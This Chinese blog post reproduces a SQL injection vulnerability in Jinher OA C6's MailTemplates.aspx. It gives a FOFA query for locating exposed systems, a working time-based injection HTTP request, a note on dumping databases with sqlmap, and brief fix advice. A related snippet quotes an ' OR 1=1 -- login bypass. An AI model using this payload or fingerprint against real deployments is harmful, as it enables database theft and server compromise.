金和OA C6 MailTemplates.aspx sql注入漏洞

已于 2024-01-09 15:45:47 修改
阅读量1.7k 收藏 7
点赞数 10
分类专栏: 漏洞复现 文章标签: sql 数据库 web安全
于 2024-01-05 15:36:07 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36618918/article/details/135410465
版权

产品介绍

金和网络是专业信息化服务商,为城市监管部门提供了互联网+监管解决方案,为企事业单位提供组织协同OA系统开发平台,电子政务一体化平台,智慧电商平台等服务。

漏洞概述

金和 OA C6 MailTemplates.aspx接口处存在SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
资产测绘

资产测绘

app=“Jinher-OA”
在这里插入图片描述

漏洞复现

测试POC:

GET /C6/JHSoft.Web.Mail/MailTemplates.aspx/?tempID=1;WAITFOR+DELAY+%270:0:5%27-- HTTP/1.1
Host: your_ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

在这里插入图片描述
成功使数据库延时5秒执行,说明存在SQL注入
Sqlmap进行验证,爆出所有数据库名:
在这里插入图片描述

修复建议

1.升级至系统最新版本。
2.部署Web应用防火墙,对数据库操作进行监控。

keepb1ue
关注
  • 10
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
OA系统漏洞记录
Aquarius_ego的博客
05-14 4766
OA系统介绍及相关漏洞(不断更新哦~)
和软件OA浏览器设置.doc
11-17
和软件OA浏览器设置 和软件OA浏览器设置是指在IE浏览器中对OA系统的浏览器设置,以确保OA系统的正常运行。下面是和软件OA浏览器设置的详细步骤和相关知识点: 设置IE浏览器属性 和软件OA浏览器设置的第一...
【复现】OA协同管理平台 任意文件上传漏洞_20
fushuang333的博客
01-16 683
【复现】OA协同管理平台 任意文件上传漏洞C6协同管理平台包括协同办公管理,人力资源管理,项目管理,客户关系管理,企业目标管理,费用管理,移动办公,微信办公等多个业务范围
记一次项目上的漏洞挖掘
Workers77的博客
02-14 3830
接到领导通知,要对某个客户的资产做一次渗透,客户只给了一个C段IP,具体的资产需要自己去收集 通过fofa搜索后,拿到一堆的资产。看了一遍发现客户有个和的OA系统,于是就有了下面的故事 打开后就是个登录界面,因为在前期信息收集的时候也看到这个OA存在一个用户名的注入漏洞(历史漏洞 和协同管理平台SQL注入漏洞(无需登录demo站成功复现) | wooyun-2015-0141624| WooYun.org),这个洞虽然比较老了,但也可以试一下。按照这个保姆级教程抓包测试 结果可想而知 ..
OA C6 MailTemplates.aspx SQL注入漏洞
3tefanie丶zhou的博客
01-09 470
【读书人读圣贤书,总得要比其他人多一些仁义道德。】
OA 数据字典 c6
09-06
OA系统,C6数据库-数据字典,分享以供大家参考,借鉴
OA_C6-自定义表单操作手册
09-13
针对OA_C6-自定义表单详细讲解手册
OA_C6_用户手册.pdf
03-05
OA_C6_用户手册,比较基本的一个介绍,适合入门级的学习以及人员培训使用。
LeetCode //SQL - 196. Delete Duplicate Emails
Made in Code
07-03 962
【代码】LeetCode //SQL - 196. Delete Duplicate Emails。
F4搜索帮助和按条件写sql
m0_60109224的博客
07-08 95
2.按条件读取刚刚写的sql数据,if sy-subrc 中可以继续读。3.搜索帮助用函数和sql实现。4.根据屏幕输入数据筛选实现。
SQL性能优化策略
最新发布
modelsetget的博客
07-08 161
你不得不知的SQL调优策略笔记
索引唯一约束问题SQL
clover_oreo的博客
07-08 252
这个问题可能是由于在Oracle APEX中,虽然你创建了一个名为"ISEQ_520227"的索引,但是在插入数据时,违反了唯一约束条件。这可能是因为你的数据表中已经存在相同的值,或者你的插入语句没有正确地使用这个索引。
PostgreSQL 如何处理海量小文件数据的存储和查询?
技术笔记
07-08 546
处理 PostgreSQL 中的海量小文件数据存储和查询是一个复杂的任务,需要考虑存储方式、查询优化、并发控制和性能调优等多个方面。根据实际的业务需求和数据特点,选择合适的解决方案,并不断进行测试和优化,以确保系统的性能和可靠性。🎉相关推荐🍅关注博主🎗️带你畅游技术世界,不错过每一次成长机会!📚领书:PostgreSQL 入门到精通.pdf📙PostgreSQL 中文手册📘PostgreSQL 技术专栏。
数据如何查询
qq_46863837的博客
07-08 861
只有学会DQL,才是真正的进入数据库的世界
SQL-DQL
qq_59076775的博客
07-03 472
X表示前面有多少位无所谓,最后一位为X。五.DQL-聚合函数将一列数据作为一个整体,进行纵向计算。
怎样优化 PostgreSQL 中对 XML 数据的存储和查询?
技术笔记
07-08 652
在 PostgreSQL 中处理 XML 数据时,为了实现高效的存储和查询,需要采取一系列的优化策略。以下将详细探讨如何优化 PostgreSQL 中对 XML 数据的存储和查询,并提供相应的解决方案和示例代码。
在 PostgreSQL 里如何处理数据的版本跟踪和回滚?
技术笔记
07-08 677
数据库管理中,数据的版本跟踪和回滚是非常重要的功能,有助于在数据操作出现错误或需要回滚到特定状态时进行有效的处理。PostgreSQL 提供了几种方法来实现数据的版本跟踪和回滚,包括事务、保存点、版本控制扩展等。
c6 sql注入
01-11
C6是一种常见的SQL注入攻击。通过利用输入验证不严谨或者未经过滤的用户输入,攻击者可以向数据库注入恶意的SQL代码,从而获取敏感信息、篡改数据甚至控制整个数据库SQL注入攻击通常发生在用户表单、URL参数或者动态生成的查询语句上。攻击者可以通过输入特定的SQL代码来绕过系统的验证,执行非法操作。例如,攻击者可以通过在用户名和密码输入框中输入" ' OR 1=1 -- "来欺骗系统,认证过程就会被绕过,允许攻击者以管理员权限登录。 要防止C6 SQL注入攻击,我们可以采取以下措施: 1. 输入验证:对用户输入进行严格的验证和过滤,确保输入的数据符合预期的格式和范围。 2. 使用参数化查询:通过使用预编译的SQL语句或存储过程,能够有效防止SQL注入攻击。 3. 最小权限原则:确保数据库账户的权限最小化,只赋予执行必要操作的权限,避免攻击者利用数据库权限进行恶意操作。 4. 定期更新和维护:确保数据库软件和系统补丁及时更新,以及数据库安全设置的定期审查和维护。 5. 日志监控:监控和审计数据库操作日志,及时发现并阻止SQL注入攻击。 综上所述,C6 SQL注入是一种常见的数据库攻击方式,需要采取一系列措施来防止和应对这种攻击,确保数据库安全和稳定运行。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值